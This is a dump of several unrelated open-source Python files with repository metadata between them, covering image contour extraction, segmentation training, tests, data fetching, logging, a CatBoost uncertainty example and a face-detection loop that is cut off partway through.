a1d4fd32a8cfcab753269455d08c1918f273388d
[ "MIT" ]
null
null
null
detection/contor.py
chika626/chainer_rep
a1d4fd32a8cfcab753269455d08c1918f273388d
[ "MIT" ]
7
2020-03-13T08:29:46.000Z
2020-05-27T17:34:14.000Z
detection/contor.py
chika626/chainer_rep
a1d4fd32a8cfcab753269455d08c1918f273388d
[ "MIT" ]
null
null
null
import json
import math
from PIL import Image,ImageDraw
import pandas as pd
import glob
import argparse
import copy
import numpy as np
import matplotlib.pyplot as plt
import pickle
import cv2
from PIL import ImageEnhance

import chainer
from chainer.datasets import ConcatenatedDataset
from chainer.datasets import TransformDataset
from chainer.optimizer_hooks import WeightDecay
from chainer import serializers
from chainer import training
from chainer.training import extensions
from chainer.training import triggers

from chainercv.datasets import voc_bbox_label_names
from chainercv.datasets import VOCBboxDataset
from chainercv.extensions import DetectionVOCEvaluator
from chainercv.links.model.ssd import GradientScaling
from chainercv.links.model.ssd import multibox_loss
from chainercv.links import SSD300
from chainercv.links import SSD512
from chainercv import transforms
from chainercv.utils import read_image

from chainercv.links.model.ssd import random_crop_with_bbox_constraints
from chainercv.links.model.ssd import random_distort
from chainercv.links.model.ssd import resize_with_random_interpolation

import queue

def run(img):
    # c , H , W = img.shape
    H,W = img.size
    img = np.asarray(img)

    # output image that receives the transformed data
    transed = Image.new('RGB',(H,W))
    for x in range(H):
        for y in range(W):
            transed.putpixel((x,y),(255,255,255))

    # mark horizontal and vertical intensity changes as black contour pixels
    for x in range(H):
        for y in range(W):
            if x + 1 == H or y + 1 == W:
                break
            if img[y][x][0] != img[y][x+1][0]:
                transed.putpixel((x,y),(0,0,0))
    for y in range(W):
        for x in range(H):
            if x + 1 == H or y + 1 == W:
                break
            if img[y][x][0] != img[y+1][x][0]:
                transed.putpixel((x,y),(0,0,0))

    return transed

def main():
    # # code for converting a single image
    # img = Image.open('cont/transed/X.jpg')
    # img=img.convert('L')
    # img=np.asarray(img)
    # ret2, img = cv2.threshold(img, 0, 255, cv2.THRESH_OTSU)
    # img=Image.fromarray(img)
    # img=img.convert('RGB')
    # transed = run(img)
    # transed.save('transec_0.png')
    # return

    # batch converter
    img_path=glob.glob("cont/crop/*")
    counter=0
    for path in img_path:
        img = Image.open(path)
        transed = run(img)
        transed.save('transec_{}.png'.format(counter))
        counter+=1

if __name__ == '__main__':
    main()
26.989247
72
0.640239
0
0
0
0
0
0
0
0
403
0.157792
fe2074c1f1219a5f9d1c7d8eeb8c9be145ffb2ea
5,982
py
Python
train.py
hjl-yul154/autodeeplab
1bd8399ac830fcafd506a4207b75e05682d1e260
[ "MIT" ]
1
2020-07-27T07:08:47.000Z
2020-07-27T07:08:47.000Z
train.py
hjl-yul154/autodeeplab
1bd8399ac830fcafd506a4207b75e05682d1e260
[ "MIT" ]
null
null
null
train.py
hjl-yul154/autodeeplab
1bd8399ac830fcafd506a4207b75e05682d1e260
[ "MIT" ]
null
null
null
import os import pdb import warnings import numpy as np import torch import torch.nn as nn import torch.utils.data import torch.backends.cudnn import torch.optim as optim import dataloaders from utils.utils import AverageMeter from utils.loss import build_criterion from utils.metrics import Evaluator from utils.step_lr_scheduler import Iter_LR_Scheduler from retrain_model.build_autodeeplab import Retrain_Autodeeplab from config_utils.re_train_autodeeplab import obtain_retrain_autodeeplab_args def main(): warnings.filterwarnings('ignore') assert torch.cuda.is_available() torch.backends.cudnn.benchmark = True args = obtain_retrain_autodeeplab_args() save_dir = os.path.join('./data/', args.save_path) if not os.path.isdir(save_dir): os.mkdir(save_dir) model_fname = os.path.join(save_dir, 'deeplab_{0}_{1}_v3_{2}_epoch%d.pth'.format(args.backbone, args.dataset, args.exp)) record_name = os.path.join(save_dir, 'training_record.txt') if args.dataset == 'pascal': raise NotImplementedError elif args.dataset == 'cityscapes': kwargs = {'num_workers': args.workers, 'pin_memory': True, 'drop_last': True} dataset_loader, num_classes, val_loader = dataloaders.make_data_loader(args, **kwargs) args.num_classes = num_classes else: raise ValueError('Unknown dataset: {}'.format(args.dataset)) if args.backbone == 'autodeeplab': model = Retrain_Autodeeplab(args) else: raise ValueError('Unknown backbone: {}'.format(args.backbone)) if args.criterion == 'Ohem': args.thresh = 0.7 args.crop_size = [args.crop_size, args.crop_size] if isinstance(args.crop_size, int) else args.crop_size args.n_min = int((args.batch_size / len(args.gpu) * args.crop_size[0] * args.crop_size[1]) // 16) criterion = build_criterion(args) model = nn.DataParallel(model).cuda() model.train() if args.freeze_bn: for m in model.modules(): if isinstance(m, nn.BatchNorm2d): m.eval() m.weight.requires_grad = False m.bias.requires_grad = False optimizer = optim.SGD(model.module.parameters(), lr=args.base_lr, momentum=0.9, weight_decay=0.0001) max_iteration = len(dataset_loader) * args.epochs scheduler = Iter_LR_Scheduler(args, max_iteration, len(dataset_loader)) start_epoch = 0 evaluator=Evaluator(num_classes) if args.resume: if os.path.isfile(args.resume): print('=> loading checkpoint {0}'.format(args.resume)) checkpoint = torch.load(args.resume) start_epoch = checkpoint['epoch'] model.load_state_dict(checkpoint['state_dict']) optimizer.load_state_dict(checkpoint['optimizer']) print('=> loaded checkpoint {0} (epoch {1})'.format(args.resume, checkpoint['epoch'])) else: raise ValueError('=> no checkpoint found at {0}'.format(args.resume)) for epoch in range(start_epoch, args.epochs): losses = AverageMeter() print('Training epoch {}'.format(epoch)) model.train() for i, sample in enumerate(dataset_loader): cur_iter = epoch * len(dataset_loader) + i scheduler(optimizer, cur_iter) inputs = sample['image'].cuda() target = sample['label'].cuda() outputs = model(inputs) loss = criterion(outputs, target) if np.isnan(loss.item()) or np.isinf(loss.item()): pdb.set_trace() losses.update(loss.item(), args.batch_size) loss.backward() optimizer.step() optimizer.zero_grad() if (i + 1) % 200 == 0: print('epoch: {0}\t''iter: {1}/{2}\t''lr: {3:.6f}\t''loss: {loss.val:.4f} ({loss.ema:.4f})'.format( epoch + 1, i + 1, len(dataset_loader), scheduler.get_lr(optimizer), loss=losses)) if epoch < args.epochs: if (epoch+1) % 5 == 0: torch.save({ 'epoch': epoch + 1, 'state_dict': model.state_dict(), 'optimizer': optimizer.state_dict(), }, model_fname % (epoch + 1)) else: 
torch.save({ 'epoch': epoch + 1, 'state_dict': model.state_dict(), 'optimizer': optimizer.state_dict(), }, model_fname % (epoch + 1)) line0 = 'epoch: {0}\t''loss: {loss.val:.4f} ({loss.ema:.4f})'.format( epoch, loss=losses) with open(record_name, 'a') as f: f.write(line0) if line0[-1] != '\n': f.write('\n') if epoch%3!=0 and epoch <args.epochs-20: continue print('Validate epoch {}'.format(epoch)) model.eval() evaluator.reset() test_loss=0.0 for i,sample in enumerate(val_loader): inputs = sample['image'].cuda() target = sample['label'].cuda() with torch.no_grad(): outputs = model(inputs) # loss = criterion(outputs, target) # test_loss+=loss.item() pred=outputs.data.cpu().numpy() target=target.cpu().numpy() pred = np.argmax(pred, axis=1) evaluator.add_batch(target,pred) Acc = evaluator.Pixel_Accuracy() Acc_class = evaluator.Pixel_Accuracy_Class() mIoU = evaluator.Mean_Intersection_over_Union() FWIoU = evaluator.Frequency_Weighted_Intersection_over_Union() print("epoch: {}\t Acc:{:.3f}, Acc_class:{:.3f}, mIoU:{:.3f}, fwIoU: {:.3f}".format(epoch,Acc, Acc_class, mIoU, FWIoU)) line1='epoch: {}\t''mIoU: {:.3f}'.format(epoch,mIoU) with open(record_name, 'a') as f: f.write(line1) if line1[-1] != '\n': f.write('\n') if __name__ == "__main__": main()
38.844156
127
0.596122
0
0
0
0
0
0
0
0
777
0.12989
fe21c2ef055f99448891893a1c18824fdde9d61e
1,883
py
Python
test.py
xxaxdxcxx/miscellaneous-code
cdb88783f39e1b9a89fdb12f7cddfe62619e4357
[ "MIT" ]
null
null
null
test.py
xxaxdxcxx/miscellaneous-code
cdb88783f39e1b9a89fdb12f7cddfe62619e4357
[ "MIT" ]
null
null
null
test.py
xxaxdxcxx/miscellaneous-code
cdb88783f39e1b9a89fdb12f7cddfe62619e4357
[ "MIT" ]
null
null
null
class Solution:
    # dictionary keys are tuples, storing results
    # structure of the tuple:
    # (level, prev_sum, val_to_include)
    # value is number of successful tuples
    def fourSumCount(self, A, B, C, D, prev_sum=0, level=0, sums=None):
        """
        :type A: List[int]
        :type B: List[int]
        :type C: List[int]
        :type D: List[int]
        :rtype: int
        """
        # start each top-level call with a fresh memo dictionary; a mutable
        # default argument would leak cached results between tests
        if sums is None:
            sums = {}
        # base case:
        if level == 3:
            total = 0
            for num in D:
                if prev_sum + num == 0:
                    print("At level 3, 0 total found using entry w/ value {0}".
                          format(num))
                    total += 1
            return total
        total = 0
        lists = [A, B, C]
        for num in lists[level]:
            if level == 0:
                print(str(sums))
            if (level, prev_sum, num) in sums:
                total += sums[(level, prev_sum, num)]
                print("Used dictionary entry {0}, making total {1}".
                      format((level, prev_sum, num), total))
            else:
                print("Call from level {0} to level {1}; current sum is {2}".
                      format(level, level + 1, prev_sum + num))
                result = self.fourSumCount(A, B, C, D,
                                           prev_sum + num, level + 1, sums)
                sums[(level, prev_sum, num)] = result
                total += result
        return total


sol = Solution()
A = [1]
B = [-1]
C = [0]
D = [1]
result = sol.fourSumCount(A, B, C, D)
print("Test 1: {0}".format(result))
A = [1, 2]
B = [-2, -1]
C = [-1, 2]
D = [0, 2]
result = sol.fourSumCount(A, B, C, D)
print("Test 2: {0}".format(result))
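
# A brute-force reference for the same problem, handy for cross-checking the
# memoized recursion above on the two small test cases it defines.
from itertools import product


def four_sum_count_bruteforce(A, B, C, D):
    # count every (a, b, c, d) combination whose sum is exactly zero
    return sum(1 for a, b, c, d in product(A, B, C, D) if a + b + c + d == 0)


print(four_sum_count_bruteforce([1], [-1], [0], [1]))                # 0
print(four_sum_count_bruteforce([1, 2], [-2, -1], [-1, 2], [0, 2]))  # 2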
31.383333
79
0.463622
1,636
0.868826
0
0
0
0
0
0
517
0.274562
fe21f2c89737b3c4d120cba724974597cb079bc4
1,675
py
Python
src/boot.py
johngtrs/krux
7b6c6d410e29c16ab5d3c05a5aafab618f13a86f
[ "MIT" ]
null
null
null
src/boot.py
johngtrs/krux
7b6c6d410e29c16ab5d3c05a5aafab618f13a86f
[ "MIT" ]
null
null
null
src/boot.py
johngtrs/krux
7b6c6d410e29c16ab5d3c05a5aafab618f13a86f
[ "MIT" ]
null
null
null
# The MIT License (MIT) # Copyright (c) 2021 Tom J. Sun # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. import machine from pmu import axp192 from context import Context from login import Login from home import Home import settings pmu = axp192() # Enable power management so that if power button is held down 6 secs, # it shuts off as expected pmu.enablePMICSleepMode(True) ctx = Context() ctx.display.flash_text(settings.load('splash', ( 'Krux' ), strip=False)) while True: if not Login(ctx).run(): break if not Home(ctx).run(): break ctx.display.flash_text(( 'Shutting down..' )) ctx.clear() pmu.setEnterSleepMode() machine.reset()
32.211538
79
0.755224
0
0
0
0
0
0
0
0
1,217
0.726567
fe224e1ffb01067a1145784abb7281fb2243b190
1,788
py
Python
smartfields/processors/video.py
suhaibroomy/django-smartfields
e9331dc74f72d0254608526f8816aa4bb8f1fca4
[ "MIT" ]
null
null
null
smartfields/processors/video.py
suhaibroomy/django-smartfields
e9331dc74f72d0254608526f8816aa4bb8f1fca4
[ "MIT" ]
null
null
null
smartfields/processors/video.py
suhaibroomy/django-smartfields
e9331dc74f72d0254608526f8816aa4bb8f1fca4
[ "MIT" ]
null
null
null
import re import six from smartfields.processors.base import ExternalFileProcessor from smartfields.utils import ProcessingError __all__ = [ 'FFMPEGProcessor' ] class FFMPEGProcessor(ExternalFileProcessor): duration_re = re.compile(r'Duration: (?P<hours>\d+):(?P<minutes>\d+):(?P<seconds>\d+)') progress_re = re.compile(r'time=(?P<hours>\d+):(?P<minutes>\d+):(?P<seconds>\d+)') error_re = re.compile(r'Invalid data found when processing input') cmd_template = "ffmpeg -i {input} -y -codec:v {vcodec} -b:v {vbitrate} " \ "-maxrate {maxrate} -bufsize {bufsize} -vf " \ "scale={width}:{height} -threads {threads} -c:a {acodec} {output}" def stdout_handler(self, line, duration=None): if duration is None: duration_time = self.duration_re.search(line) if duration_time: duration = self.timedict_to_seconds(duration_time.groupdict()) elif duration != 0: current_time = self.progress_re.search(line) if current_time: seconds = self.timedict_to_seconds(current_time.groupdict()) progress = float(seconds)/duration progress = progress if progress < 1 else 0.99 self.set_progress(progress) elif self.error_re.search(line): raise ProcessingError("Invalid video file or unknown video format.") return (duration,) def timedict_to_seconds(self, timedict): seconds = 0 for key, t in six.iteritems(timedict): if key == 'seconds': seconds+= int(t) elif key == 'minutes': seconds+= int(t)*60 elif key == 'hours': seconds+= int(t)*3600 return seconds
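
# The duration regex and the hours/minutes/seconds arithmetic from
# FFMPEGProcessor above, exercised against a made-up ffmpeg log line.
import re

duration_re = re.compile(r'Duration: (?P<hours>\d+):(?P<minutes>\d+):(?P<seconds>\d+)')
line = "  Duration: 00:02:30.05, start: 0.000000, bitrate: 1205 kb/s"  # example line
parts = duration_re.search(line).groupdict()
total_seconds = int(parts['hours']) * 3600 + int(parts['minutes']) * 60 + int(parts['seconds'])
print(total_seconds)  # 150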
39.733333
91
0.599553
1,619
0.905481
0
0
0
0
0
0
414
0.231544
fe22b8aac4f7560fc1450a1ab43865faaf7aecdc
2,192
py
Python
tests/test_vmtkScripts/test_vmtksurfaceconnectivity.py
ramtingh/vmtk
4d6f58ce65d73628353ba2b110cbc29a2e7aa7b3
[ "Apache-2.0" ]
null
null
null
tests/test_vmtkScripts/test_vmtksurfaceconnectivity.py
ramtingh/vmtk
4d6f58ce65d73628353ba2b110cbc29a2e7aa7b3
[ "Apache-2.0" ]
null
null
null
tests/test_vmtkScripts/test_vmtksurfaceconnectivity.py
ramtingh/vmtk
4d6f58ce65d73628353ba2b110cbc29a2e7aa7b3
[ "Apache-2.0" ]
1
2019-06-18T23:41:11.000Z
2019-06-18T23:41:11.000Z
## Program: VMTK ## Language: Python ## Date: January 12, 2018 ## Version: 1.4 ## Copyright (c) Richard Izzo, Luca Antiga, All rights reserved. ## See LICENSE file for details. ## This software is distributed WITHOUT ANY WARRANTY; without even ## the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR ## PURPOSE. See the above copyright notices for more information. ## Note: this code was contributed by ## Richard Izzo (Github @rlizzo) ## University at Buffalo import pytest import vmtk.vmtksurfaceconnectivity as connectivity import os @pytest.fixture(scope='module') def aorta_surface_two_segments(input_datadir): import vmtk.vmtksurfacereader as surfacereader reader = surfacereader.vmtkSurfaceReader() reader.InputFileName = os.path.join(input_datadir, 'aorta-surface-two-segments.vtp') reader.Execute() return reader.Surface def test_extract_largest_surface(aorta_surface_two_segments, compare_surfaces): name = __name__ + '_test_extract_largest_surface.vtp' connectiv = connectivity.vmtkSurfaceConnectivity() connectiv.Surface = aorta_surface_two_segments connectiv.Method = 'largest' connectiv.CleanOutput = 1 connectiv.Execute() assert compare_surfaces(connectiv.Surface, name) == True def test_extract_closest_to_reference_surface(aorta_surface_two_segments, aorta_surface_reference, compare_surfaces): name = __name__ + '_test_extract_closest_to_reference_surface.vtp' connectiv = connectivity.vmtkSurfaceConnectivity() connectiv.Surface = aorta_surface_two_segments connectiv.Method = 'closest' connectiv.ReferenceSurface = aorta_surface_reference connectiv.Execute() assert compare_surfaces(connectiv.Surface, name) == True def test_extract_closest_to_point(aorta_surface_two_segments, compare_surfaces): name = __name__ + '_test_extract_closest_to_point.vtp' connectiv = connectivity.vmtkSurfaceConnectivity() connectiv.Surface = aorta_surface_two_segments connectiv.Method = 'closest' connectiv.ClosestPoint = [0.0, 0.0, 0.0] connectiv.Execute() assert compare_surfaces(connectiv.Surface, name) == True
35.354839
117
0.764599
0
0
0
0
312
0.142336
0
0
691
0.315237
fe23546882c9babc55f9bce0abdfba0776ff09c5
653
py
Python
sssoon/forms.py
Kingpin-Apps/django-sssoon
2a44d0d19e70dcd3127f9425c0ed4ba52355a1d2
[ "BSD-3-Clause" ]
2
2018-04-20T08:28:10.000Z
2018-05-04T15:32:30.000Z
sssoon/forms.py
KINGH242/django-sssoon
2a44d0d19e70dcd3127f9425c0ed4ba52355a1d2
[ "BSD-3-Clause" ]
2
2018-05-16T13:45:14.000Z
2020-07-29T22:01:37.000Z
sssoon/forms.py
Kingpin-Apps/django-sssoon
2a44d0d19e70dcd3127f9425c0ed4ba52355a1d2
[ "BSD-3-Clause" ]
null
null
null
from django import forms from nocaptcha_recaptcha.fields import NoReCaptchaField class NewsletterForm(forms.Form): email = forms.EmailField(label='Email', required=True, widget=forms.TextInput(attrs={ 'id': 'newsletter-email', 'type': 'email', 'title': 'Email', 'name': 'email', 'class': 'form-control transparent', 'placeholder': '[email protected]' })) captcha = NoReCaptchaField()
40.8125
70
0.444104
570
0.872894
0
0
0
0
0
0
137
0.209801
fe242c827a7e391a419864c9504b7e2daf4968d1
1,054
py
Python
simple_run_menu.py
william01110111/simple_run_menu
804c6bb8d6c63c3a4d4c6d3377601bd44fb0eeea
[ "MIT" ]
null
null
null
simple_run_menu.py
william01110111/simple_run_menu
804c6bb8d6c63c3a4d4c6d3377601bd44fb0eeea
[ "MIT" ]
null
null
null
simple_run_menu.py
william01110111/simple_run_menu
804c6bb8d6c63c3a4d4c6d3377601bd44fb0eeea
[ "MIT" ]
null
null
null
#! /bin/python3
# simple run menu

import os
import stat


def is_file_executable(path):
    executable = stat.S_IEXEC | stat.S_IXGRP | stat.S_IXOTH
    if not os.path.isfile(path):
        return False
    st = os.stat(path)
    mode = st.st_mode
    if not mode & executable:
        return False
    return True


def get_files_in_dir(directory):
    if directory == '':
        directory = '.'
    if directory[-1] != '/':
        directory += '/'
    return [directory + i for i in os.listdir(directory)]


def command_to_name(command):
    filename_with_ext = os.path.basename(command)
    filename = filename_with_ext.rsplit('.', 1)[0]
    name = filename.replace('_', ' ')
    capitalized = ' '.join([i[0].upper() + i[1:] for i in name.split()])
    return capitalized


class Option:
    options = {}

    @staticmethod
    def add(command):
        # register on the class-level dict rather than an undefined bare name
        Option.options['a'] = Option(command, command, 'a')

    def __init__(self, name, command, trigger):
        self.name = name
        self.command = command
        self.trigger = trigger


if __name__ == "__main__":
    print([command_to_name(i) for i in get_files_in_dir('') if is_file_executable(i)])
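
# What command_to_name produces for a couple of made-up script paths, assuming
# the file above is importable as the module simple_run_menu.
from simple_run_menu import command_to_name

print(command_to_name('./scripts/backup_home_dir.sh'))  # Backup Home Dir
print(command_to_name('/usr/local/bin/run-now'))        # Run-now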
22.425532
83
0.685009
228
0.216319
0
0
79
0.074953
0
0
73
0.06926
fe2476b1a28089e744d395040c690305385ddcb6
1,792
py
Python
mne/io/cnt/tests/test_cnt.py
stevemats/mne-python
47051833f21bb372d60afc3adbf4305648ac7f69
[ "BSD-3-Clause" ]
1,953
2015-01-17T20:33:46.000Z
2022-03-30T04:36:34.000Z
mne/io/cnt/tests/test_cnt.py
LiFeng-SECUC/mne-python
732bb1f994e64e41a8e95dcc10dc98c22cac95c0
[ "BSD-3-Clause" ]
8,490
2015-01-01T13:04:18.000Z
2022-03-31T23:02:08.000Z
mne/io/cnt/tests/test_cnt.py
LiFeng-SECUC/mne-python
732bb1f994e64e41a8e95dcc10dc98c22cac95c0
[ "BSD-3-Clause" ]
1,130
2015-01-08T22:39:27.000Z
2022-03-30T21:44:26.000Z
# Author: Jaakko Leppakangas <[email protected]>
#         Joan Massich <[email protected]>
#
# License: BSD-3-Clause

import os.path as op

import numpy as np
from numpy.testing import assert_array_equal
import pytest

from mne import pick_types
from mne.datasets import testing
from mne.io.tests.test_raw import _test_raw_reader
from mne.io.cnt import read_raw_cnt
from mne.annotations import read_annotations

data_path = testing.data_path(download=False)
fname = op.join(data_path, 'CNT', 'scan41_short.cnt')


@testing.requires_testing_data
def test_data():
    """Test reading raw cnt files."""
    with pytest.warns(RuntimeWarning, match='number of bytes'):
        raw = _test_raw_reader(read_raw_cnt, input_fname=fname,
                               eog='auto', misc=['NA1', 'LEFT_EAR'])

    # make sure we use annotations event if we synthesized stim
    assert len(raw.annotations) == 6

    eog_chs = pick_types(raw.info, eog=True, exclude=[])
    assert len(eog_chs) == 2  # test eog='auto'
    assert raw.info['bads'] == ['LEFT_EAR', 'VEOGR']  # test bads

    # the data has "05/10/200 17:35:31" so it is set to None
    assert raw.info['meas_date'] is None


@testing.requires_testing_data
def test_compare_events_and_annotations():
    """Test comparing annotations and events."""
    with pytest.warns(RuntimeWarning, match='Could not parse meas date'):
        raw = read_raw_cnt(fname)
    events = np.array([[333, 0, 7],
                       [1010, 0, 7],
                       [1664, 0, 109],
                       [2324, 0, 7],
                       [2984, 0, 109]])

    annot = read_annotations(fname)
    assert len(annot) == 6
    assert_array_equal(annot.onset[:-1], events[:, 0] / raw.info['sfreq'])
    assert 'STI 014' not in raw.info['ch_names']
32
74
0.65346
0
0
0
0
1,266
0.706473
0
0
488
0.272321
fe24a27fb5e1b1af1324c59e811661bad02c4101
792
py
Python
parliament_proposal_fetcher.py
Track-your-parliament/track-your-parliament-data
1ab9d9fe5cf4921e4cc792d0e3db3263557daafd
[ "MIT" ]
null
null
null
parliament_proposal_fetcher.py
Track-your-parliament/track-your-parliament-data
1ab9d9fe5cf4921e4cc792d0e3db3263557daafd
[ "MIT" ]
null
null
null
parliament_proposal_fetcher.py
Track-your-parliament/track-your-parliament-data
1ab9d9fe5cf4921e4cc792d0e3db3263557daafd
[ "MIT" ]
null
null
null
import urllib.request, json
import pandas as pd

baseUrl = 'https://avoindata.eduskunta.fi/api/v1/tables/VaskiData'
parameters = 'rows?columnName=Eduskuntatunnus&columnValue=LA%25&perPage=100'

page = 0
df = ''

while True:
    print(f'Fetching page number {page}')
    with urllib.request.urlopen(f'{baseUrl}/{parameters}&page={page}') as url:
        data = json.loads(url.read().decode())

        if page == 0:
            columns = data['columnNames']
            df = pd.DataFrame(columns=columns)

        dataRows = data['rowData']
        df = df.append(pd.DataFrame(dataRows, columns=data['columnNames']), ignore_index=True)

        if data['hasMore'] == False:
            break

        page = page + 1

df.to_csv('./data/parliament_proposals_raw.csv', sep=';', encoding='utf-8')
29.333333
94
0.641414
0
0
0
0
0
0
0
0
279
0.352273
fe2717913fd1b6cb1c949e299c54e281bc41335e
2,899
py
Python
examples/Catboost_regression-scorer_usage.py
emaldonadocruz/UTuning
b32207bcbeb80e4c07e098bcbe4d5ce8b3fee778
[ "BSD-3-Clause" ]
null
null
null
examples/Catboost_regression-scorer_usage.py
emaldonadocruz/UTuning
b32207bcbeb80e4c07e098bcbe4d5ce8b3fee778
[ "BSD-3-Clause" ]
null
null
null
examples/Catboost_regression-scorer_usage.py
emaldonadocruz/UTuning
b32207bcbeb80e4c07e098bcbe4d5ce8b3fee778
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 20 16:15:37 2021

@author: em42363
"""
# In[1]: Import functions
'''
CatBoost is a high-performance open source library for
gradient boosting on decision trees
'''
from catboost import CatBoostRegressor
from sklearn.model_selection import train_test_split

import pandas as pd
import seaborn as sns
import numpy as np

import os
os.chdir(os.path.dirname(__file__))

import sys
sys.path.insert(0, r'C:\Users\eduar\OneDrive\PhD\UTuning')
sys.path.insert(0, r'C:\Users\em42363\OneDrive\PhD\UTuning')

from UTuning import scorer, plots

#df = pd.read_csv(r'C:\Users\eduar\OneDrive\PhD\UTuning\dataset\unconv_MV.csv')
df = pd.read_csv(r'C:\Users\em42363\OneDrive\PhD\UTuning\dataset\unconv_MV.csv')

import random
import matplotlib.pyplot as plt

# In[1]: Split train test
'''
Perform split train test
'''
y = df['Production'].values
X = df[['Por', 'LogPerm', 'Brittle', 'TOC']].values

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33)

# In[6]: Regressor
'''
Define the regressor, fit the model and predict the estimates
'''
model = CatBoostRegressor(iterations=1000, learning_rate=0.2,
                          loss_function='RMSEWithUncertainty',
                          verbose=False, random_seed=0)

model.fit(X_train, y_train)
estimates = model.predict(X_test)

# In[9]: Plot error line
'''
Use UTuning to plot error lines
'''
plots.error_line(estimates[:, 0], y_test, np.sqrt(estimates[:, 1]), Frac=1)

# %% Define the virtual ensemble

def virt_ensemble(X_train,y_train, num_samples=100, iters=1000, lr=0.1): # 100, .1

    ens_preds = []

    model = CatBoostRegressor(iterations=iters, learning_rate=lr,
                              loss_function='RMSEWithUncertainty',
                              verbose=False, random_seed=1)

    model.fit(X_train,y_train)

    ens_preds = model.virtual_ensembles_predict(X_test, prediction_type='VirtEnsembles',
                                                virtual_ensembles_count=num_samples,
                                                thread_count=8)

    return np.asarray(ens_preds)

# %%
n_quantiles = 11
perc = np.linspace(0.0, 1.00, n_quantiles)

Samples = 10

ens_preds=virt_ensemble(X_train,y_train, num_samples=Samples)

Pred_array = ens_preds[:,:,0]

Knowledge_u=np.sqrt(np.var(Pred_array,axis=1)) #Knowledge uncertainty

Data_u=np.sqrt(np.mean(ens_preds[:,:,1],axis=1)) #Data uncertainty

Sigma=Knowledge_u+Data_u

# %%
'''
We use UTuning to return the Indicator Function and
plot the accuracy plot and diagnose our model.
'''
scorer = scorer.scorer(Pred_array, y_test, Sigma)

IF_array = scorer.IndicatorFunction()

avgIF = np.mean(IF_array,axis=0)

# % Second plot test
plots.error_accuracy_plot(perc,IF_array,Pred_array,y_test,Sigma)

# %
print('Accuracy = {0:2.2f}'.format(scorer.Accuracy()))
print('Precision = {0:2.2f}'.format(scorer.Precision()))
print('Goodness = {0:2.2f}'.format(scorer.Goodness()))
26.354545
102
0.703001
0
0
0
0
0
0
0
0
1,011
0.348741
fe27a69a39058bf33d488a199887b8c07ffdf22c
1,683
py
Python
sujson/_logger.py
PotasnikM/translator-to-suJSON
abb2001c78d431bd2087754666bc896ba0543dfd
[ "MIT" ]
2
2019-07-01T12:45:25.000Z
2020-06-23T11:48:08.000Z
sujson/_logger.py
PotasnikM/translator-to-suJSON
abb2001c78d431bd2087754666bc896ba0543dfd
[ "MIT" ]
17
2019-04-25T10:46:40.000Z
2020-11-10T09:28:55.000Z
sujson/_logger.py
PotasnikM/translator-to-suJSON
abb2001c78d431bd2087754666bc896ba0543dfd
[ "MIT" ]
3
2019-06-22T19:51:08.000Z
2021-02-08T09:17:55.000Z
import logging
from platform import system

from tqdm import tqdm
from multiprocessing import Lock

loggers = {}


# https://stackoverflow.com/questions/38543506/
class TqdmLoggingHandler(logging.Handler):
    def __init__(self, level=logging.NOTSET):
        super(TqdmLoggingHandler, self).__init__(level)

    def emit(self, record):
        try:
            msg = self.format(record)
            tqdm.set_lock(Lock())
            tqdm.write(msg)
            self.flush()
        except (KeyboardInterrupt, SystemExit):
            raise
        except:
            self.handleError(record)


def setup_custom_logger(name):
    """
    Create a logger with a certain name and level
    """
    global loggers

    if loggers.get(name):
        return loggers.get(name)

    formatter = logging.Formatter(
        fmt='%(levelname)s: %(message)s'
    )

    handler = TqdmLoggingHandler()
    handler.setFormatter(formatter)

    if system() not in ['Windows', 'cli']:
        logging.addLevelName(logging.ERROR, "\033[1;31m%s\033[1;0m" % logging.getLevelName(logging.ERROR))
        logging.addLevelName(logging.WARNING, "\033[1;33m%s\033[1;0m" % logging.getLevelName(logging.WARNING))
        logging.addLevelName(logging.INFO, "\033[1;34m%s\033[1;0m" % logging.getLevelName(logging.INFO))
        logging.addLevelName(logging.DEBUG, "\033[1;35m%s\033[1;0m" % logging.getLevelName(logging.DEBUG))

    logger = logging.getLogger(name)
    logger.setLevel(logging.WARNING)

    # if (logger.hasHandlers()):
    #     logger.handlers.clear()
    if logger.handlers:
        logger.handlers = []

    logger.addHandler(handler)

    loggers.update(dict(name=logger))

    return logger
29.017241
110
0.655971
430
0.255496
0
0
0
0
0
0
299
0.177659
fe27abc65b6073ec58be633f81761077a129a312
1,243
py
Python
face-detect.py
Gicehajunior/face-recognition-detection-OpenCv-Python
6551285ce5b4532d8b6f3ad6b8e9a29564673ea9
[ "Unlicense" ]
null
null
null
face-detect.py
Gicehajunior/face-recognition-detection-OpenCv-Python
6551285ce5b4532d8b6f3ad6b8e9a29564673ea9
[ "Unlicense" ]
null
null
null
face-detect.py
Gicehajunior/face-recognition-detection-OpenCv-Python
6551285ce5b4532d8b6f3ad6b8e9a29564673ea9
[ "Unlicense" ]
null
null
null
import cv2
import sys
import playsound

face_cascade = cv2.CascadeClassifier('cascades/haarcascade_frontalface_default.xml')

# capture video using cv2
video_capture = cv2.VideoCapture(0)

while True:
    # capture frame by frame, i.e, one by one
    ret, frame = video_capture.read()

    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)

    # for each face on the projected on the frame
    faces = face_cascade.detectMultiScale(
        gray,
        scaleFactor = 1.1,
        minNeighbors = 5,
        # minSize(35, 35)
    )

    # loop through the video faces for detection
    for (x, y, w, h) in faces:
        point1 = x+w
        point2 = y+h

        frame_color = (50, 50, 200)

        rectangleBox = cv2.rectangle(frame, (x, y), (point1, point2), frame_color, 2)
